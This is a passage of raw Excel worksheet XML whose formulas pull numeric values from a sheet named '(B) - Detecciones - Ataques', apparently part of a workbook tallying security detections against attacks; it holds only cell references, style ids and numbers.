        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV45" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW45" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX45" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="46" ht="60.0" customHeight="1">
      <c r="B46" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C46" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D46" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E46" s="145" t="s">
        <v>501</v>
      </c>
      <c r="F46" s="280">
        <f>'(B) - Detecciones - Ataques'!P37</f>
        <v>1</v>
      </c>
      <c r="G46" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ37</f>
        <v>0</v>
      </c>
      <c r="H46" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ37</f>
        <v>0</v>
      </c>
      <c r="I46" s="271">
        <f>'(B) - Detecciones - Ataques'!AS37</f>
        <v>0</v>
      </c>
      <c r="J46" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ37</f>
        <v>0</v>
      </c>
      <c r="K46" s="271">
        <f>'(B) - Detecciones - Ataques'!BP37</f>
        <v>0</v>
      </c>
      <c r="L46" s="281">
        <f>'(B) - Detecciones - Ataques'!BW37</f>
        <v>0</v>
      </c>
      <c r="M46" s="271">
        <f>'(B) - Detecciones - Ataques'!CM37</f>
        <v>0</v>
      </c>
      <c r="N46" s="281">
        <f>'(B) - Detecciones - Ataques'!CT37</f>
        <v>0</v>
      </c>
      <c r="O46" s="280">
        <f>'(B) - Detecciones - Ataques'!EC37</f>
        <v>0</v>
      </c>
      <c r="P46" s="281">
        <f>'(B) - Detecciones - Ataques'!ED37</f>
        <v>0</v>
      </c>
      <c r="Q46" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB46" s="275" t="s">
        <v>1099</v>
      </c>
      <c r="AC46" s="275">
        <f t="shared" si="22"/>
        <v>4</v>
      </c>
      <c r="AD46" s="284">
        <f t="shared" si="23"/>
        <v>0.75</v>
      </c>
      <c r="AE46" s="284">
        <f t="shared" si="24"/>
        <v>0.75</v>
      </c>
      <c r="AF46" s="298"/>
      <c r="AG46" s="1" t="s">
        <v>167</v>
      </c>
      <c r="AL46" s="287" t="s">
        <v>854</v>
      </c>
      <c r="AM46" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN46" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO46" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP46" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ46" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS46" s="287" t="s">
        <v>854</v>
      </c>
      <c r="AT46" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU46" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV46" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW46" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX46" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="47" ht="60.0" customHeight="1">
      <c r="B47" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C47" s="143" t="s">
        <v>505</v>
      </c>
      <c r="D47" s="143" t="s">
        <v>506</v>
      </c>
      <c r="E47" s="145" t="s">
        <v>509</v>
      </c>
      <c r="F47" s="280">
        <f>'(B) - Detecciones - Ataques'!P38</f>
        <v>1</v>
      </c>
      <c r="G47" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ38</f>
        <v>0</v>
      </c>
      <c r="H47" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ38</f>
        <v>0</v>
      </c>
      <c r="I47" s="271">
        <f>'(B) - Detecciones - Ataques'!AS38</f>
        <v>0</v>
      </c>
      <c r="J47" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ38</f>
        <v>0</v>
      </c>
      <c r="K47" s="271">
        <f>'(B) - Detecciones - Ataques'!BP38</f>
        <v>0</v>
      </c>
      <c r="L47" s="281">
        <f>'(B) - Detecciones - Ataques'!BW38</f>
        <v>0</v>
      </c>
      <c r="M47" s="271">
        <f>'(B) - Detecciones - Ataques'!CM38</f>
        <v>0</v>
      </c>
      <c r="N47" s="281">
        <f>'(B) - Detecciones - Ataques'!CT38</f>
        <v>0</v>
      </c>
      <c r="O47" s="280">
        <f>'(B) - Detecciones - Ataques'!EC38</f>
        <v>0</v>
      </c>
      <c r="P47" s="281">
        <f>'(B) - Detecciones - Ataques'!ED38</f>
        <v>0</v>
      </c>
      <c r="Q47" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB47" s="275" t="s">
        <v>505</v>
      </c>
      <c r="AC47" s="275">
        <f t="shared" si="22"/>
        <v>6</v>
      </c>
      <c r="AD47" s="284">
        <f t="shared" si="23"/>
        <v>0.1760480309</v>
      </c>
      <c r="AE47" s="284">
        <f t="shared" si="24"/>
        <v>0.1731835784</v>
      </c>
      <c r="AF47" s="298"/>
      <c r="AL47" s="287" t="s">
        <v>867</v>
      </c>
      <c r="AM47" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN47" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO47" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP47" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ47" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS47" s="287" t="s">
        <v>867</v>
      </c>
      <c r="AT47" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU47" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV47" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW47" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX47" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="48" ht="60.0" customHeight="1">
      <c r="B48" s="142" t="s">
        <v>514</v>
      </c>
      <c r="C48" s="143" t="s">
        <v>505</v>
      </c>
      <c r="D48" s="143" t="s">
        <v>506</v>
      </c>
      <c r="E48" s="145" t="s">
        <v>516</v>
      </c>
      <c r="F48" s="280">
        <f>'(B) - Detecciones - Ataques'!P39</f>
        <v>1</v>
      </c>
      <c r="G48" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ39</f>
        <v>0</v>
      </c>
      <c r="H48" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ39</f>
        <v>0</v>
      </c>
      <c r="I48" s="271">
        <f>'(B) - Detecciones - Ataques'!AS39</f>
        <v>0</v>
      </c>
      <c r="J48" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ39</f>
        <v>0</v>
      </c>
      <c r="K48" s="271">
        <f>'(B) - Detecciones - Ataques'!BP39</f>
        <v>0</v>
      </c>
      <c r="L48" s="281">
        <f>'(B) - Detecciones - Ataques'!BW39</f>
        <v>0</v>
      </c>
      <c r="M48" s="271">
        <f>'(B) - Detecciones - Ataques'!CM39</f>
        <v>0</v>
      </c>
      <c r="N48" s="281">
        <f>'(B) - Detecciones - Ataques'!CT39</f>
        <v>0</v>
      </c>
      <c r="O48" s="280">
        <f>'(B) - Detecciones - Ataques'!EC39</f>
        <v>0</v>
      </c>
      <c r="P48" s="281">
        <f>'(B) - Detecciones - Ataques'!ED39</f>
        <v>0</v>
      </c>
      <c r="Q48" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB48" s="275" t="s">
        <v>1245</v>
      </c>
      <c r="AC48" s="275">
        <f t="shared" si="22"/>
        <v>2</v>
      </c>
      <c r="AD48" s="284">
        <f t="shared" si="23"/>
        <v>0.5</v>
      </c>
      <c r="AE48" s="284">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="AF48" s="298"/>
      <c r="AL48" s="287" t="s">
        <v>882</v>
      </c>
      <c r="AM48" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN48" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO48" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP48" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ48" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS48" s="287" t="s">
        <v>882</v>
      </c>
      <c r="AT48" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU48" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV48" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW48" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX48" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="49" ht="60.0" customHeight="1">
      <c r="B49" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C49" s="143" t="s">
        <v>505</v>
      </c>
      <c r="D49" s="143" t="s">
        <v>506</v>
      </c>
      <c r="E49" s="145" t="s">
        <v>521</v>
      </c>
      <c r="F49" s="280">
        <f>'(B) - Detecciones - Ataques'!P40</f>
        <v>1</v>
      </c>
      <c r="G49" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ40</f>
        <v>0</v>
      </c>
      <c r="H49" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ40</f>
        <v>0</v>
      </c>
      <c r="I49" s="271">
        <f>'(B) - Detecciones - Ataques'!AS40</f>
        <v>0</v>
      </c>
      <c r="J49" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ40</f>
        <v>0</v>
      </c>
      <c r="K49" s="271">
        <f>'(B) - Detecciones - Ataques'!BP40</f>
        <v>0</v>
      </c>
      <c r="L49" s="281">
        <f>'(B) - Detecciones - Ataques'!BW40</f>
        <v>0</v>
      </c>
      <c r="M49" s="271">
        <f>'(B) - Detecciones - Ataques'!CM40</f>
        <v>0</v>
      </c>
      <c r="N49" s="281">
        <f>'(B) - Detecciones - Ataques'!CT40</f>
        <v>0</v>
      </c>
      <c r="O49" s="280">
        <f>'(B) - Detecciones - Ataques'!EC40</f>
        <v>0</v>
      </c>
      <c r="P49" s="281">
        <f>'(B) - Detecciones - Ataques'!ED40</f>
        <v>0</v>
      </c>
      <c r="Q49" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB49" s="275" t="s">
        <v>1347</v>
      </c>
      <c r="AC49" s="275">
        <f t="shared" si="22"/>
        <v>2</v>
      </c>
      <c r="AD49" s="284">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="AE49" s="284">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="AF49" s="298"/>
      <c r="AL49" s="287" t="s">
        <v>896</v>
      </c>
      <c r="AM49" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN49" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO49" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP49" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ49" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS49" s="287" t="s">
        <v>896</v>
      </c>
      <c r="AT49" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU49" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV49" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW49" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX49" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="50" ht="60.0" customHeight="1">
      <c r="B50" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C50" s="143" t="s">
        <v>505</v>
      </c>
      <c r="D50" s="143" t="s">
        <v>506</v>
      </c>
      <c r="E50" s="145" t="s">
        <v>526</v>
      </c>
      <c r="F50" s="280">
        <f>'(B) - Detecciones - Ataques'!P41</f>
        <v>1</v>
      </c>
      <c r="G50" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ41</f>
        <v>0</v>
      </c>
      <c r="H50" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ41</f>
        <v>0</v>
      </c>
      <c r="I50" s="271">
        <f>'(B) - Detecciones - Ataques'!AS41</f>
        <v>0</v>
      </c>
      <c r="J50" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ41</f>
        <v>0</v>
      </c>
      <c r="K50" s="271">
        <f>'(B) - Detecciones - Ataques'!BP41</f>
        <v>0</v>
      </c>
      <c r="L50" s="281">
        <f>'(B) - Detecciones - Ataques'!BW41</f>
        <v>0</v>
      </c>
      <c r="M50" s="271">
        <f>'(B) - Detecciones - Ataques'!CM41</f>
        <v>0</v>
      </c>
      <c r="N50" s="281">
        <f>'(B) - Detecciones - Ataques'!CT41</f>
        <v>0</v>
      </c>
      <c r="O50" s="280">
        <f>'(B) - Detecciones - Ataques'!EC41</f>
        <v>0</v>
      </c>
      <c r="P50" s="281">
        <f>'(B) - Detecciones - Ataques'!ED41</f>
        <v>0</v>
      </c>
      <c r="Q50" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL50" s="287" t="s">
        <v>911</v>
      </c>
      <c r="AM50" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN50" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO50" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP50" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ50" s="285">
        <f t="shared" si="13"/>
        <v>0.5</v>
      </c>
      <c r="AS50" s="287" t="s">
        <v>911</v>
      </c>
      <c r="AT50" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU50" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV50" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW50" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX50" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="60.0" customHeight="1">
      <c r="B51" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C51" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D51" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E51" s="145" t="s">
        <v>541</v>
      </c>
      <c r="F51" s="280">
        <f>'(B) - Detecciones - Ataques'!P42</f>
        <v>1</v>
      </c>
      <c r="G51" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ42</f>
        <v>0</v>
      </c>
      <c r="H51" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ42</f>
        <v>0</v>
      </c>
      <c r="I51" s="271">
        <f>'(B) - Detecciones - Ataques'!AS42</f>
        <v>0</v>
      </c>
      <c r="J51" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ42</f>
        <v>0</v>
      </c>
      <c r="K51" s="271">
        <f>'(B) - Detecciones - Ataques'!BP42</f>
        <v>0</v>
      </c>
      <c r="L51" s="281">
        <f>'(B) - Detecciones - Ataques'!BW42</f>
        <v>0</v>
      </c>
      <c r="M51" s="271">
        <f>'(B) - Detecciones - Ataques'!CM42</f>
        <v>0</v>
      </c>
      <c r="N51" s="281">
        <f>'(B) - Detecciones - Ataques'!CT42</f>
        <v>0</v>
      </c>
      <c r="O51" s="280">
        <f>'(B) - Detecciones - Ataques'!EC42</f>
        <v>0</v>
      </c>
      <c r="P51" s="281">
        <f>'(B) - Detecciones - Ataques'!ED42</f>
        <v>0</v>
      </c>
      <c r="Q51" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL51" s="287" t="s">
        <v>933</v>
      </c>
      <c r="AM51" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN51" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO51" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP51" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ51" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS51" s="287" t="s">
        <v>933</v>
      </c>
      <c r="AT51" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU51" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV51" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW51" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX51" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="60.0" customHeight="1">
      <c r="B52" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C52" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D52" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E52" s="145" t="s">
        <v>546</v>
      </c>
      <c r="F52" s="280">
        <f>'(B) - Detecciones - Ataques'!P43</f>
        <v>2</v>
      </c>
      <c r="G52" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ43</f>
        <v>0</v>
      </c>
      <c r="H52" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ43</f>
        <v>0</v>
      </c>
      <c r="I52" s="271">
        <f>'(B) - Detecciones - Ataques'!AS43</f>
        <v>0</v>
      </c>
      <c r="J52" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ43</f>
        <v>0</v>
      </c>
      <c r="K52" s="271">
        <f>'(B) - Detecciones - Ataques'!BP43</f>
        <v>0</v>
      </c>
      <c r="L52" s="281">
        <f>'(B) - Detecciones - Ataques'!BW43</f>
        <v>0</v>
      </c>
      <c r="M52" s="271">
        <f>'(B) - Detecciones - Ataques'!CM43</f>
        <v>0</v>
      </c>
      <c r="N52" s="281">
        <f>'(B) - Detecciones - Ataques'!CT43</f>
        <v>0</v>
      </c>
      <c r="O52" s="280">
        <f>'(B) - Detecciones - Ataques'!EC43</f>
        <v>0</v>
      </c>
      <c r="P52" s="281">
        <f>'(B) - Detecciones - Ataques'!ED43</f>
        <v>0</v>
      </c>
      <c r="Q52" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL52" s="287" t="s">
        <v>942</v>
      </c>
      <c r="AM52" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN52" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO52" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP52" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ52" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS52" s="287" t="s">
        <v>942</v>
      </c>
      <c r="AT52" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU52" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV52" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW52" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX52" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="53" ht="60.0" customHeight="1">
      <c r="B53" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C53" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D53" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E53" s="145" t="s">
        <v>553</v>
      </c>
      <c r="F53" s="280">
        <f>'(B) - Detecciones - Ataques'!P44</f>
        <v>1</v>
      </c>
      <c r="G53" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ44</f>
        <v>0</v>
      </c>
      <c r="H53" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ44</f>
        <v>0</v>
      </c>
      <c r="I53" s="271">
        <f>'(B) - Detecciones - Ataques'!AS44</f>
        <v>0</v>
      </c>
      <c r="J53" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ44</f>
        <v>0</v>
      </c>
      <c r="K53" s="271">
        <f>'(B) - Detecciones - Ataques'!BP44</f>
        <v>0</v>
      </c>
      <c r="L53" s="281">
        <f>'(B) - Detecciones - Ataques'!BW44</f>
        <v>0</v>
      </c>
      <c r="M53" s="271">
        <f>'(B) - Detecciones - Ataques'!CM44</f>
        <v>0</v>
      </c>
      <c r="N53" s="281">
        <f>'(B) - Detecciones - Ataques'!CT44</f>
        <v>0</v>
      </c>
      <c r="O53" s="280">
        <f>'(B) - Detecciones - Ataques'!EC44</f>
        <v>0</v>
      </c>
      <c r="P53" s="281">
        <f>'(B) - Detecciones - Ataques'!ED44</f>
        <v>0</v>
      </c>
      <c r="Q53" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL53" s="287" t="s">
        <v>952</v>
      </c>
      <c r="AM53" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN53" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO53" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP53" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ53" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS53" s="287" t="s">
        <v>952</v>
      </c>
      <c r="AT53" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU53" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV53" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW53" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX53" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="54" ht="60.0" customHeight="1">
      <c r="B54" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C54" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D54" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E54" s="145" t="s">
        <v>561</v>
      </c>
      <c r="F54" s="280">
        <f>'(B) - Detecciones - Ataques'!P45</f>
        <v>1</v>
      </c>
      <c r="G54" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ45</f>
        <v>0</v>
      </c>
      <c r="H54" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ45</f>
        <v>0</v>
      </c>
      <c r="I54" s="271">
        <f>'(B) - Detecciones - Ataques'!AS45</f>
        <v>0</v>
      </c>
      <c r="J54" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ45</f>
        <v>0</v>
      </c>
      <c r="K54" s="271">
        <f>'(B) - Detecciones - Ataques'!BP45</f>
        <v>0</v>
      </c>
      <c r="L54" s="281">
        <f>'(B) - Detecciones - Ataques'!BW45</f>
        <v>0</v>
      </c>
      <c r="M54" s="271">
        <f>'(B) - Detecciones - Ataques'!CM45</f>
        <v>0</v>
      </c>
      <c r="N54" s="281">
        <f>'(B) - Detecciones - Ataques'!CT45</f>
        <v>0</v>
      </c>
      <c r="O54" s="280">
        <f>'(B) - Detecciones - Ataques'!EC45</f>
        <v>0</v>
      </c>
      <c r="P54" s="281">
        <f>'(B) - Detecciones - Ataques'!ED45</f>
        <v>0</v>
      </c>
      <c r="Q54" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL54" s="287" t="s">
        <v>961</v>
      </c>
      <c r="AM54" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN54" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO54" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP54" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ54" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS54" s="287" t="s">
        <v>961</v>
      </c>
      <c r="AT54" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU54" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV54" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW54" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX54" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="55" ht="60.0" customHeight="1">
      <c r="B55" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C55" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D55" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E55" s="145" t="s">
        <v>568</v>
      </c>
      <c r="F55" s="280">
        <f>'(B) - Detecciones - Ataques'!P46</f>
        <v>1</v>
      </c>
      <c r="G55" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ46</f>
        <v>0</v>
      </c>
      <c r="H55" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ46</f>
        <v>0</v>
      </c>
      <c r="I55" s="271">
        <f>'(B) - Detecciones - Ataques'!AS46</f>
        <v>0</v>
      </c>
      <c r="J55" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ46</f>
        <v>0</v>
      </c>
      <c r="K55" s="271">
        <f>'(B) - Detecciones - Ataques'!BP46</f>
        <v>0</v>
      </c>
      <c r="L55" s="281">
        <f>'(B) - Detecciones - Ataques'!BW46</f>
        <v>0</v>
      </c>
      <c r="M55" s="271">
        <f>'(B) - Detecciones - Ataques'!CM46</f>
        <v>0</v>
      </c>
      <c r="N55" s="281">
        <f>'(B) - Detecciones - Ataques'!CT46</f>
        <v>0</v>
      </c>
      <c r="O55" s="280">
        <f>'(B) - Detecciones - Ataques'!EC46</f>
        <v>0</v>
      </c>
      <c r="P55" s="281">
        <f>'(B) - Detecciones - Ataques'!ED46</f>
        <v>0</v>
      </c>
      <c r="Q55" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL55" s="287" t="s">
        <v>975</v>
      </c>
      <c r="AM55" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN55" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO55" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP55" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ55" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS55" s="287" t="s">
        <v>975</v>
      </c>
      <c r="AT55" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU55" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV55" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW55" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX55" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="56" ht="60.0" customHeight="1">
      <c r="B56" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C56" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D56" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E56" s="145" t="s">
        <v>573</v>
      </c>
      <c r="F56" s="280">
        <f>'(B) - Detecciones - Ataques'!P47</f>
        <v>1</v>
      </c>
      <c r="G56" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ47</f>
        <v>0</v>
      </c>
      <c r="H56" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ47</f>
        <v>0</v>
      </c>
      <c r="I56" s="271">
        <f>'(B) - Detecciones - Ataques'!AS47</f>
        <v>0</v>
      </c>
      <c r="J56" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ47</f>
        <v>0</v>
      </c>
      <c r="K56" s="271">
        <f>'(B) - Detecciones - Ataques'!BP47</f>
        <v>0</v>
      </c>
      <c r="L56" s="281">
        <f>'(B) - Detecciones - Ataques'!BW47</f>
        <v>0</v>
      </c>
      <c r="M56" s="271">
        <f>'(B) - Detecciones - Ataques'!CM47</f>
        <v>0</v>
      </c>
      <c r="N56" s="281">
        <f>'(B) - Detecciones - Ataques'!CT47</f>
        <v>0</v>
      </c>
      <c r="O56" s="280">
        <f>'(B) - Detecciones - Ataques'!EC47</f>
        <v>0</v>
      </c>
      <c r="P56" s="281">
        <f>'(B) - Detecciones - Ataques'!ED47</f>
        <v>0</v>
      </c>
      <c r="Q56" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL56" s="287" t="s">
        <v>983</v>
      </c>
      <c r="AM56" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN56" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO56" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP56" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ56" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS56" s="287" t="s">
        <v>983</v>
      </c>
      <c r="AT56" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU56" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV56" s="284" t="str">
